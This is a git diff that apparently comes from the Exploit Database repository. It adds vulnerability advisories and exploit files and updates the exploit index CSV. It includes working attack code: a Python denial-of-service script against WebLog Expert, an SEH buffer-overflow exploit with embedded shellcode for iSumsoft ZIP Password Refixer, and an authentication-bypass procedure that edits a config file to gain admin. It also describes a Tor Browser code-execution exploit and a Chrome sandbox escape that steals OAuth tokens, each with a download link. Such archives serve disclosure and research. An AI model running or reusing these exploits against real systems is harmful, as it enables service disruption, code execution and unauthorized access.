+[+] Source:  http://hyp3rlinx.altervista.org/advisories/WEBLOG-EXPERT-WEB-SERVER-ENTERPRISE-v9.4-DENIAL-OF-SERVICE.txt
+[+] ISR: Apparition Security          
+ 
+
+Vendor:
+=======
+www.weblogexpert.com
+
+
+Product:
+=========
+WebLog Expert Web Server Enterprise v9.4
+
+WebLog Expert is a fast and powerful access log analyzer. It will give you information about your site's visitors:
+activity statistics, accessed files, paths through the site, information about referring pages, search engines, browsers,
+operating systems, and more. The program produces easy-to-read reports that include both text information (tables) and charts.
+
+
+
+Vulnerability Type:
+===================
+Denial Of Service
+
+
+CVE Reference:
+==============
+CVE-2018-7582
+
+
+
+Security Issue:
+================
+WebLog Expert Web Server Enterprise 9.4 allows Remote Denial Of Service (daemon crash) via a long HTTP Accept Header to TCP port 9991.
+
+
+(e7c.1750): CLR exception - code e0434352 (first/second chance not available)
+eax=00000000 ebx=06d1d098 ecx=00000005 edx=00000000 esi=00000002 edi=00000000
+eip=778d016d esp=06d1d048 ebp=06d1d0e4 iopl=0         nv up ei pl zr na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
+ntdll!NtWaitForMultipleObjects+0x15:
+778d016d 83c404          add     esp,4
+
+
+
+Exploit/POC:
+=============
+import socket
+
+print 'Weblog Expert Server / Denial Of Service'
+print 'hyp3rlinx'
+
+IP='Weblog Expert Server IP'
+PORT=9991
+PAYLOAD="GET /index.html HTTP/1.0 Host: +'IP'+':9991 User-Agent: Mozilla Accept: */*" + "A"*2000+'\r\n\r\n'
+
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((IP,PORT))
+s.send(PAYLOAD)
+s.close()
+
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+Severity:
+=========
+Medium
+
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: February 3, 2018
+Second attempt : February 17, 2018
+March 7, 2018 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
\ No newline at end of file
diff --git a/exploits/windows/local/44224.py b/exploits/windows/local/44224.py
new file mode 100755
index 000000000..d04314ca8
--- /dev/null
+++ b/exploits/windows/local/44224.py
@@ -0,0 +1,51 @@
+author = '''
+   
+                ##############################################
+                #    Created: ScrR1pTK1dd13                  #
+                #    Name: Greg Priest                       #
+                #    Mail: ScR1pTK1dd13.slammer@gmail.com    # 
+                ##############################################
+   
+# Exploit Title:iSumsoft Local Buffer Overflow Vuln. 0day(SEH)
+# Date: 2018.03.02
+# Exploit Author: Greg Priest
+# Version: iSumsoft ZIP Password Refixer Version 3.1.1
+# Tested on: Windows7 x64 HUN/ENG Professional
+'''
+
+junk = "A" * 340
+nSEH = "\xeb\x06\x90\x90"
+SEH = "\x0C\x70\x8D\x73"
+nop = "\x90" *16
+
+shellcode =(
+"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" + #cmd.exe shellcode! 
+"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
+"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
+"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
+"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
+"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
+"\x45\x81\x3e\x43\x72\x65\x61\x75" +
+"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
+"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
+"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
+"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
+"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
+"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
+"\x53\x53\x53\x53\x52\x53\xff\xd7")
+
+crash = junk + nSEH + SEH + nop + shellcode + "C" * 300
+
+exploit = open('iSumsoft-exploit.txt', 'w')
+exploit.write(crash)
+exploit.close()
+
+print author
+print '''
+        #####################
+        #This is a PoC code!#   
+        #####################
+
+'''
+print "[+] iSumsoft-exploit.txt ready!"
+print '[+] Copy iSumsoft-exploit.txt string and paste "start from:" field!'
\ No newline at end of file
diff --git a/exploits/windows/local/44263.md b/exploits/windows/local/44263.md
new file mode 100644
index 000000000..e128067a2
--- /dev/null
+++ b/exploits/windows/local/44263.md
@@ -0,0 +1,31 @@
+## What?
+
+This repo contains a Proof of Concept exploit for CVE-2017-8570, a.k.a the "Composite Moniker" vulnerability. This demonstrates using the Packager.dll trick to drop an sct file into the %TEMP% directory, and then execute it using the primitive that the vulnerability provides.
+
+Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44263.zip
+
+## Why?
+
+A few reasons.
+
+1. I wanted to see if it was possible to use the [Packager.dll file-dropping trick](https://securingtomorrow.mcafee.com/mcafee-labs/dropping-files-temp-folder-raises-security-concerns/) to exploit this vulnerability.
+2. As far as I'm aware, all other public exploits for CVE-2017-8570 are actually exploiting the "Script Moniker" variant of CVE-2017-0199 and are not actually composite moniker exploits.
+3. Raise awareness of exploitation techniques used in the wild, and help defenders to detect exploitation attempts.
+
+## How to run
+
+Simply run the script, providing an Sct file to execute, and an output name for your RTF file:
+
+    python packager_composite_moniker.py -s calc.sct -o example.rtf
+    [+] RTF file written to: example.rtf
+
+
+## Detection
+
+I have included a Yara rule to detect attempts to exploit this vulnerability via RTF.
+
+## References
+
+- https://justhaifei1.blogspot.co.uk/2017/07/bypassing-microsofts-cve-2017-0199-patch.html
+- https://securingtomorrow.mcafee.com/mcafee-labs/dropping-files-temp-folder-raises-security-concerns/
+- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570
\ No newline at end of file
diff --git a/exploits/windows/local/44267.md b/exploits/windows/local/44267.md
new file mode 100644
index 000000000..76e705194
--- /dev/null
+++ b/exploits/windows/local/44267.md
@@ -0,0 +1,12 @@
+# TOR Browser 0day : JavaScript Exploit !
+## Works on Firefox versions 41 - 50
+### The critical vulnerability is believed to affect multiple Windows versions of the open source Firefox web browser as far back as Firefox version 41, and up to Firefox version 50. When exploit opened by a Firefox or Tor Browser with Javascript enabled on a Windows computer, it leverage a memory corruption vulnerability in the background to make direct calls to kernel32.dll, which allows malicious code to be executed on computers running Windows.
+<i>Makes redirect to '/member.php' after code execution</i>
+
+- - -
+
+This is an Javascript exploit actively used against TorBrowser NOW. It consists of one HTML and one CSS file, both pasted below and also de-obscured. The exact functionality is unknown but it's getting access to "VirtualAlloc" in "kernel32.dll" and goes from there. Please fix ASAP. I had to break the "thecode" line in two in order to post, remove ' + ' in the middle to restore it. - SIGAINT
+
+
+
+Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44267.zip
\ No newline at end of file
diff --git a/exploits/windows/local/44269.txt b/exploits/windows/local/44269.txt
new file mode 100644
index 000000000..4f04e4ead
--- /dev/null
+++ b/exploits/windows/local/44269.txt
@@ -0,0 +1,3 @@
+Sandbox escape Chrome exploit. Allows the execution of local binaries, read/write functions and exfiltration of Chrome OAuth tokens to remote server. More info: https://bugs.chromium.org/p/chromium/issues/detail?id=386988
+
+Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44269.zip
\ No newline at end of file
diff --git a/exploits/windows/local/44270.txt b/exploits/windows/local/44270.txt
new file mode 100644
index 000000000..54c29f009
--- /dev/null
+++ b/exploits/windows/local/44270.txt
@@ -0,0 +1,91 @@
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/WEBLOG-EXPERT-WEB-SERVER-ENTERPRISE-v9.4-AUTHENTICATION-BYPASS.txt
+[+] ISR: Apparition Security          
+ 
+
+Vendor:
+========
+www.weblogexpert.com
+
+
+Product:
+========
+WebLog Expert Web Server Enterprise v9.4
+
+WebLog Expert is a fast and powerful access log analyzer. It will give you information about your site's visitors:
+activity statistics, accessed files, paths through the site, information about referring pages, search engines, browsers,
+operating systems, and more. The program produces easy-to-read reports that include both text information (tables) and charts.
+
+
+
+Vulnerability Type:
+===================
+Authentication Bypass
+
+
+
+CVE Reference:
+==============
+CVE-2018-7581
+
+
+
+Security Issue:
+================
+The "WebServer.cfg" under "ProgramData\WebLog Expert\WebServer\" used by WebLog Expert Web Server Enterprise 9.4
+has weak permissions (BUILTIN\Users:(ID)C), which allows local users to set a cleartext password and login as admin.
+
+A standard non Windows Administrator user can edit the 'WebServer.cfg' file under "C:\ProgramData\WebLog Expert\WebServer"
+set to a cleartext password and login as admin.
+
+e.g.
+
+C:\ProgramData\WebLog Expert\WebServer>cacls * | more
+C:\ProgramData\WebLog Expert\WebServer\WebServer.cfg BUILTIN\Users:(ID)C         
+                                                      BUILTIN\Administrators:(ID)C
+                                                      NT AUTHORITY\SYSTEM:(ID)F
+                                                      BUILTIN\Administrators:(ID)F
+
+
+Exploit/POC:
+=============
+Login as a 'Standard' Windows user
+Comment out the Admin hashed password using ';' then add any cleartext password as follows.
+
+[User:admin]
+Password=1234
+;PasswordHash=3413C538CE5234FB194E82AE1F3954FD2BC848C0
+bAllProfiles=1
+
+Now login in as Admin! :)
+
+
+
+Network Access:
+===============
+Local
+
+
+
+Severity:
+=========
+Medium
+
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: March 1, 2018
+No replies from previous attempts
+March 7, 2018 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index ac3e52553..326dcbe0e 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -746,7 +746,7 @@ id,file,description,date,author,type,platform,port
 5817,exploits/windows/dos/5817.pl,"Dana IRC 1.3 - Remote Buffer Overflow (PoC)",2008-06-14,t0pP8uZz,dos,windows,
 5843,exploits/windows/dos/5843.html,"P2P Foxy - Out of Memory Denial of Service",2008-06-17,Styxosaurus,dos,windows,
 5851,exploits/windows/dos/5851.txt,"Visual Basic Enterprise Edition SP6 - 'vb6skit.dll' Buffer Overflow (PoC)",2008-06-18,shinnai,dos,windows,
-5918,exploits/windows/dos/5918.pl,"uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 - Range header Denial of Service",2008-06-23,Exodus,dos,windows,
+5918,exploits/windows/dos/5918.pl,"μTorrent (uTorrent) / BitTorrent WebIU HTTP 1.7.7/6.0.1 - Range header Denial of Service",2008-06-23,Exodus,dos,windows,
 5968,exploits/windows/dos/5968.py,"Surgemail 39e-1 - Authenticated IMAP Remote Buffer Overflow (Denial of Service) (PoC)",2008-06-30,"Travis Warren",dos,windows,
 6029,exploits/multiple/dos/6029.txt,"Mozilla Firefox/Evince/EOG/Gimp - '.SVG' Denial of Service (PoC)",2008-07-08,"Kristian Hermansen",dos,multiple,
 6043,exploits/osx/dos/6043.rb,"Core Image Fun House 2.0 (OSX) - Arbitrary Code Execution (PoC)",2008-07-11,"Adriel T. Desautels",dos,osx,
@@ -1176,7 +1176,7 @@ id,file,description,date,author,type,platform,port
 9517,exploits/windows/dos/9517.txt,"Lotus note connector for BlackBerry Manager 5.0.0.11 - ActiveX Denial of Service",2009-08-25,"Francis Provencher",dos,windows,
 9528,exploits/windows/dos/9528.py,"TFTPUtil GUI 1.3.0 - Remote Denial of Service",2009-08-26,"ThE g0bL!N",dos,windows,
 9537,exploits/windows/dos/9537.html,"Kaspersky 2010 - Remote Memory Corruption / Denial of Service (PoC)",2009-08-28,"Prakhar Prasad",dos,windows,
-9539,exploits/windows/dos/9539.py,"uTorrent 1.8.3 Build 15772 - Create New Torrent Buffer Overflow (PoC)",2009-08-28,Dr_IDE,dos,windows,
+9539,exploits/windows/dos/9539.py,"μTorrent (uTorrent) 1.8.3 Build 15772 - Create New Torrent Buffer Overflow (PoC)",2009-08-28,Dr_IDE,dos,windows,
 9546,exploits/windows/dos/9546.pl,"Swift Ultralite 1.032 - '.m3u' Local Buffer Overflow (PoC)",2009-08-31,hack4love,dos,windows,
 9547,exploits/windows/dos/9547.pl,"SolarWinds TFTP Server 9.2.0.111 - Remote Denial of Service",2009-08-31,"Gaurav Baruah",dos,windows,
 9549,exploits/windows/dos/9549.c,"MailEnable 1.52 - HTTP Mail Service Stack Buffer Overflow (PoC)",2009-08-31,"fl0 fl0w",dos,windows,
@@ -1467,7 +1467,7 @@ id,file,description,date,author,type,platform,port
 11985,exploits/windows/dos/11985.sh,"BitComet 1.19 - Remote Denial of Service",2010-03-31,"Pierre Nogues",dos,windows,
 12000,exploits/windows/dos/12000.pl,"Kwik Pay Payroll 4.10.3 - '.mdb' Crash (PoC)",2010-04-01,anonymous,dos,windows,
 12001,exploits/windows/dos/12001.pl,"Kwik Pay Payroll 4.10.3 - '.zip' Denial of Service",2010-04-01,anonymous,dos,windows,
-12010,exploits/windows/dos/12010.pl,"uTorrent WebUI 0.370 - Authorisation Header Denial of Service",2010-04-02,"zombiefx darkernet",dos,windows,
+12010,exploits/windows/dos/12010.pl,"μTorrent (uTorrent) WebUI 0.370 - Authorisation Header Denial of Service",2010-04-02,"zombiefx darkernet",dos,windows,
 12011,exploits/windows/dos/12011.txt,"Google Chrome 4.1 - Out-of-Bounds Array Indexing",2010-04-02,"Tobias Klein",dos,windows,
 12025,exploits/windows/dos/12025.php,"Dualis 20.4 - '.bin' Local Denial of Service",2010-04-03,"Yakir Wizman",dos,windows,
 12027,exploits/windows/dos/12027.py,"DSEmu 0.4.10 - '.nds' Local Crash",2010-04-03,l3D,dos,windows,
@@ -5890,12 +5890,16 @@ id,file,description,date,author,type,platform,port
 44236,exploits/macos/dos/44236.c,"Apple macOS Sierra 10.12.3 - 'IOFireWireFamily-null-deref' FireWire Port Denial of Service",2017-08-16,"Brandon Azad",dos,macos,
 44247,exploits/multiple/dos/44247.txt,"Suricata < 4.0.4 - IDS Detection Bypass",2018-03-05,"Positive Technologies",dos,multiple,
 44251,exploits/windows/dos/44251.txt,"ActivePDF Toolkit < 8.1.0.19023 - Multiple Memory Corruptions",2018-03-05,"François Goichon",dos,windows,
-44254,exploits/linux/dos/44254.py,"Memcached - 'memcrashed' Denial of Service",2018-03-05,"Alex Conrey",dos,linux,11211
+44254,exploits/linux/dos/44254.py,"Memcached 1.5.5 - 'Memcrashed' Insufficient Control Network Message Volume Denial of Service (2)",2018-03-05,"Alex Conrey",dos,linux,11211
 44255,exploits/windows/dos/44255.txt,"Softros Network Time System Server 2.3.4 - Denial of Service",2018-03-06,hyp3rlinx,dos,windows,
 44257,exploits/multiple/dos/44257.js,"Chrome V8 JIT - Simplified-lowererer IrOpcode::kStoreField_ IrOpcode::kStoreElement Optimization Bug",2018-03-06,"Google Security Research",dos,multiple,
 44258,exploits/multiple/dos/44258.js,"Chrome V8 JIT - JSBuiltinReducer::ReduceObjectCreate Fails to Ensure that the Prototype is _null_",2018-03-06,"Google Security Research",dos,multiple,
 44259,exploits/multiple/dos/44259.js,"Chrome V8 JIT - 'GetSpecializationContext' Type Confusion",2018-03-06,"Google Security Research",dos,multiple,
 44260,exploits/multiple/dos/44260.js,"Chrome V8 JIT - Empty BytecodeJumpTable Out-of-Bounds Read",2018-03-06,"Google Security Research",dos,multiple,
+44264,exploits/linux/dos/44264.c,"Memcached 1.5.5 - 'Memcrashed' Insufficient Control Network Message Volume Denial of Service (1)",2018-03-05,anonymous,dos,linux,11211
+44265,exploits/linux/dos/44265.py,"Memcached 1.5.5 - 'Memcrashed ' Insufficient Control of Network Message Volume Denial of Service With Shodan API",2018-03-08,649,dos,linux,11211
+44268,exploits/android/dos/44268.txt,"Broadcom BCM43xx Wi-Fi  - 'BroadPWN' Denial of Service",2016-12-01,649,dos,android,
+44271,exploits/windows/dos/44271.py,"WebLog Expert Enterprise 9.4 - Denial of Service",2018-03-09,hyp3rlinx,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -7073,7 +7077,7 @@ id,file,description,date,author,type,platform,port
 14721,exploits/windows/local/14721.c,"Wireshark 1.2.10 - 'airpcap.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows,
 14723,exploits/windows/local/14723.c,"Microsoft PowerPoint 2010 - 'pptimpconv.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows,
 14727,exploits/windows/local/14727.py,"Foxit Reader 4.0 - '.pdf' Multiple Stack Based Buffer Overflow 'Jailbreak'",2010-08-24,"Jose Miguel Esparza",local,windows,
-14726,exploits/windows/local/14726.c,"uTorrent 2.0.3 - 'plugin_dll.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows,
+14726,exploits/windows/local/14726.c,"μTorrent (uTorrent) 2.0.3 - 'plugin_dll.dll' DLL Hijacking",2010-08-24,TheLeader,local,windows,
 14728,exploits/windows/local/14728.c,"Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Nicolas Krassas",local,windows,
 14730,exploits/windows/local/14730.c,"Mozilla Firefox 3.6.8 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous",local,windows,
 14731,exploits/windows/local/14731.c,"Microsoft Windows Movie Maker 2.6.4038.0 - 'hhctrl.ocx' DLL Hijacking",2010-08-24,TheLeader,local,windows,
@@ -7089,7 +7093,7 @@ id,file,description,date,author,type,platform,port
 14740,exploits/windows/local/14740.c,"Adobe Dreamweaver CS5 11.0 build 4909 - 'mfc90loc.dll' DLL Hijacking",2010-08-25,diwr,local,windows,
 14741,exploits/windows/local/14741.c,"Adobe Photoshop CS2 - 'Wintab32.dll' DLL Hijacking",2010-08-25,storm,local,windows,
 14743,exploits/windows/local/14743.c,"Avast! 5.0.594 - 'mfc90loc.dll' License Files DLL Hijacking",2010-08-25,diwr,local,windows,
-14748,exploits/windows/local/14748.txt,"uTorrent 2.0.3 - DLL Hijacking",2010-08-25,Dr_IDE,local,windows,
+14748,exploits/windows/local/14748.txt,"μTorrent (uTorrent) 2.0.3 - DLL Hijacking",2010-08-25,Dr_IDE,local,windows,
 14750,exploits/windows/local/14750.txt,"VideoLAN VLC Media Player 1.1.3 - 'wintab32.dll' DLL Hijacking",2010-08-25,Secfence,local,windows,
 14751,exploits/windows/local/14751.txt,"Microsoft Vista - 'fveapi.dll' BitLocker Drive Encryption API Hijacking",2010-08-25,"Beenu Arora",local,windows,
 14752,exploits/windows/local/14752.c,"Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking",2010-08-25,"Beenu Arora",local,windows,
@@ -9570,6 +9574,7 @@ id,file,description,date,author,type,platform,port
 44204,exploits/linux/local/44204.md,"WebKitGTK 2.1.2  (Ubuntu 14.04) - Heap based Buffer Overflow",2017-08-19,"Ren Kimura",local,linux,
 44205,exploits/linux/local/44205.md,"Linux Kernel - 'BadIRET' Local Privilege Escalation",2017-07-24,"Ren Kimura",local,linux,
 44206,exploits/hardware/local/44206.c,"Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Loader",2016-04-27,"Carlos Pizarro",local,hardware,
+44224,exploits/windows/local/44224.py,"iSumsoft ZIP Password Refixer 3.1.1 - Buffer Overflow",2018-03-02,ScrR1pTK1dd13,local,windows,
 38457,exploits/windows/local/38457.c,"ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow",2015-10-17,"Ivan Ivanovic",local,windows,
 44234,exploits/macos/local/44234.c,"Apple macOS High Sierra 10.13 - 'ctl_ctloutput-leak' Information Leak",2017-12-07,"Brandon Azad",local,macos,
 44237,exploits/macos/local/44237.md,"Apple macOS Sierra 10.12.1 - 'physmem' Local Privilege Escalation",2017-01-16,"Brandon Azad",local,macos,
@@ -9577,6 +9582,11 @@ id,file,description,date,author,type,platform,port
 44243,exploits/windows/local/44243.pl,"Xion 1.0.125 - '.m3u' Local SEH-Based Unicode Venetian Exploit",2018-03-05,synthetic,local,windows,
 44244,exploits/windows/local/44244.py,"Dup Scout Enterprise 10.5.12 - 'Share Username' Local Buffer Overflow",2018-03-05,bzyo,local,windows,
 44246,exploits/linux/local/44246.txt,"Sophos UTM 9.410 - 'loginuser' 'confd' Service Privilege Escalation",2018-03-05,KoreLogic,local,linux,
+44263,exploits/windows/local/44263.md,"Microsoft Office - 'Composite Moniker Remote Code Execution",2018-01-09,"Rich Warren",local,windows,
+44266,exploits/multiple/local/44266.html,"Mozilla Firefox - Address Bar Spoofing",2017-04-14,649,local,multiple,
+44267,exploits/windows/local/44267.md,"Tor (Firefox 41 < 50) - Code Execution",2016-12-01,649,local,windows,
+44269,exploits/windows/local/44269.txt,"Chrome 35.0.1916.153 - Sandbox Escape / Command Execution",2017-10-14,649,local,windows,
+44270,exploits/windows/local/44270.txt,"WebLog Expert Enterprise 9.4 - Authentication Bypass",2018-03-09,hyp3rlinx,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -10166,7 +10176,7 @@ id,file,description,date,author,type,platform,port
 3291,exploits/windows/remote/3291.pl,"SAP Web Application Server 6.40 - Arbitrary File Disclosure",2007-02-08,Nicob,remote,windows,
 3293,exploits/solaris/remote/3293.sh,"SunOS 5.10/5.11 in.TelnetD - Remote Authentication Bypass",2007-02-11,kingcope,remote,solaris,23
 3294,exploits/hardware/remote/3294.txt,"IP3 NetAccess < 4.1.9.6 - Arbitrary File Disclosure",2007-02-11,"Sebastian Wolfgarten",remote,hardware,80
-3296,exploits/windows/remote/3296.c,"uTorrent 1.6 build 474 - 'announce' Key Remote Heap Overflow",2007-02-12,defsec,remote,windows,
+3296,exploits/windows/remote/3296.c,"μTorrent (uTorrent) 1.6 build 474 - 'announce' Key Remote Heap Overflow",2007-02-12,defsec,remote,windows,
 3302,exploits/windows/remote/3302.sh,"Lotus Domino R6 Webmail - Remote Password Hash Dumper",2007-02-13,"Marco Ivaldi",remote,windows,80
 3303,exploits/multiple/remote/3303.sh,"Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack",2007-02-13,"Marco Ivaldi",remote,multiple,
 3319,exploits/windows/remote/3319.pl,"MailEnable IMAPD Enterprise 2.32 < 2.34 - Remote Buffer Overflow",2007-02-16,mu-b,remote,windows,143
@@ -12231,7 +12241,7 @@ id,file,description,date,author,type,platform,port
 19537,exploits/windows/remote/19537.txt,"teamshare teamtrack 3.0 - Directory Traversal",1999-10-02,"rain forest puppy",remote,windows,
 19538,exploits/hardware/remote/19538.txt,"Hybrid Networks Cable Broadband Access System 1.0 - Remote Configuration",1999-10-05,KSR[T],remote,hardware,
 19539,exploits/windows/remote/19539.txt,"Microsoft Internet Explorer 5.0/4.0.1 - iFrame",1999-10-11,"Georgi Guninski",remote,windows,
-19540,exploits/windows/remote/19540.txt,"t. hauck jana WebServer 1.0/1.45/1.46 - Directory Traversal",1999-10-08,"Jason Lutz",remote,windows,
+19540,exploits/windows/remote/19540.txt,"T. Hauck Jana Server 1.0/1.45/1.46 - Directory Traversal",1999-10-08,"Jason Lutz",remote,windows,
 19553,exploits/php/remote/19553.txt,"PHP/FI 1.0/FI 2.0/FI 2.0 b10 - mylog/mlog",1997-10-19,"Bryan Berg",remote,php,
 19554,exploits/hardware/remote/19554.c,"Lucent Ascend MAX 5.0/Pipeline 6.0/TNT 1.0/2.0 Router - MAX UDP Port 9 (1)",1998-03-16,Rootshell,remote,hardware,
 19555,exploits/hardware/remote/19555.pl,"Lucent Ascend MAX 5.0/Pipeline 6.0/TNT 1.0/2.0 Router - MAX UDP Port 9 (2)",1998-03-17,Rootshell,remote,hardware,
@@ -16048,6 +16058,7 @@ id,file,description,date,author,type,platform,port
 43386,exploits/linux/remote/43386.py,"Fortinet FortiGate 4.x < 5.0.7 - SSH Backdoor Access",2016-01-09,operator8203,remote,linux,
 43387,exploits/hardware/remote/43387.py,"Netcore / Netis Routers - UDP Backdoor Access",2016-12-15,nixawk,remote,hardware,53413
 43388,exploits/multiple/remote/43388.md,"Trend Micro Smart Protection Server - Session Hijacking / Log File Disclosure / Remote Command Execution / Cron Job Injection / Local File Inclusion / Stored Cross-Site Scripting / Improper Access Control",2017-12-19,CoreLabs,remote,multiple,
+43392,exploits/multiple/remote/43392.py,"Oracle WebLogic Server 10.3.6.0.0 / 12.x - Remote Command Execution",2017-12-26,1337g,remote,multiple,
 43407,exploits/windows/remote/43407.rb,"ALLMediaServer 0.95 - Remote Buffer Overflow (Metasploit)",2017-12-28,"Anurag Srivastava",remote,windows,
 43408,exploits/windows/remote/43408.py,"NetTransport 2.96L - Remote Buffer Overflow (DEP Bypass)",2017-12-29,"Aloyce J. Makalanga",remote,windows,
 43411,exploits/windows/remote/43411.rb,"HP Mercury LoadRunner Agent magentproc.exe - Remote Command Execution (Metasploit)",2018-01-01,Metasploit,remote,windows,54345
@@ -16070,6 +16081,7 @@ id,file,description,date,author,type,platform,port
 43523,exploits/windows/remote/43523.py,"ALLMediaServer 0.95 - Remote Buffer Overflow",2018-01-11,"Mario Kartone Ciccarelli",remote,windows,
 41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows,
 43902,exploits/multiple/remote/43902.py,"BMC BladeLogic 8.3.00.64 - Remote Command Execution",2018-01-26,"Paul Taylor",remote,multiple,
+43905,exploits/multiple/remote/43905.py,"Werkzeug - 'Debug Shell' Command Execution",2018-01-28,"Ali BawazeEer",remote,multiple,
 43920,exploits/linux/remote/43920.py,"Trend Micro Threat Discovery Appliance 2.6.1062r1 - 'dlp_policy_upload.cgi' Remote Code Execution",2018-01-28,mr_me,remote,linux,
 43924,exploits/multiple/remote/43924.rb,"Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit)",2018-01-29,Metasploit,remote,multiple,
 43927,exploits/windows/remote/43927.txt,"HPE iMC 7.3 - RMI Java Deserialization",2018-01-30,"Chris Lyne",remote,windows,
@@ -18808,7 +18820,7 @@ id,file,description,date,author,type,platform,port
 4937,exploits/php/webapps/4937.txt,"Small Axe 0.3.1 - 'cfile' Remote File Inclusion",2008-01-18,RoMaNcYxHaCkEr,webapps,php,
 4939,exploits/php/webapps/4939.txt,"WordPress Plugin WP-Forum 1.7.4 - SQL Injection",2008-01-19,"websec Team",webapps,php,
 4940,exploits/php/webapps/4940.pl,"Mini File Host 1.2.1 - 'language' Local File Inclusion",2008-01-20,shinmai,webapps,php,
-4942,exploits/php/webapps/4942.txt,"TikiWiki < 1.9.9 - 'tiki-listmovies.php' Directory Traversal",2008-01-20,Sha0,webapps,php,
+4942,exploits/php/webapps/4942.txt,"TikiWiki Project < 1.9.9 - 'tiki-listmovies.php' Directory Traversal",2008-01-20,Sha0,webapps,php,
 4943,exploits/php/webapps/4943.txt,"Frimousse 0.0.2 - 'explorerdir.php' Local Directory Traversal",2008-01-20,Houssamix,webapps,php,
 4944,exploits/php/webapps/4944.txt,"360 Web Manager 3.0 - 'IDFM' SQL Injection",2008-01-20,"Ded MustD!e",webapps,php,
 4945,exploits/php/webapps/4945.txt,"bloofox 0.3 - SQL Injection / File Disclosure",2008-01-20,BugReport.IR,webapps,php,
@@ -23778,7 +23790,7 @@ id,file,description,date,author,type,platform,port
 12767,exploits/php/webapps/12767.txt,"parlic Design - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-27,XroGuE,webapps,php,
 12768,exploits/php/webapps/12768.txt,"Hampshire Trading Standards Script - SQL Injection",2010-05-27,Mr.P3rfekT,webapps,php,
 12769,exploits/php/webapps/12769.txt,"Joomla! Component com_mediqna 1.1 - Local File Inclusion",2010-05-27,kaMtiEz,webapps,php,
-12770,exploits/php/webapps/12770.txt,"toronja CMS - SQL Injection",2010-05-27,cyberlog,webapps,php,
+12770,exploits/php/webapps/12770.txt,"Toronja CMS - SQL Injection",2010-05-27,cyberlog,webapps,php,
 12771,exploits/php/webapps/12771.txt,"Toronja CMS - HTML / Cross-Site Scripting Injection",2010-05-27,CoBRa_21,webapps,php,
 12772,exploits/php/webapps/12772.txt,"Realtor WebSite System E-Commerce - SQL Injection",2010-05-27,cyberlog,webapps,php,
 12773,exploits/php/webapps/12773.txt,"Realtor Real Estate Agent - 'idproperty' SQL Injection",2010-05-28,v3n0m,webapps,php,
@@ -32408,7 +32420,7 @@ id,file,description,date,author,type,platform,port
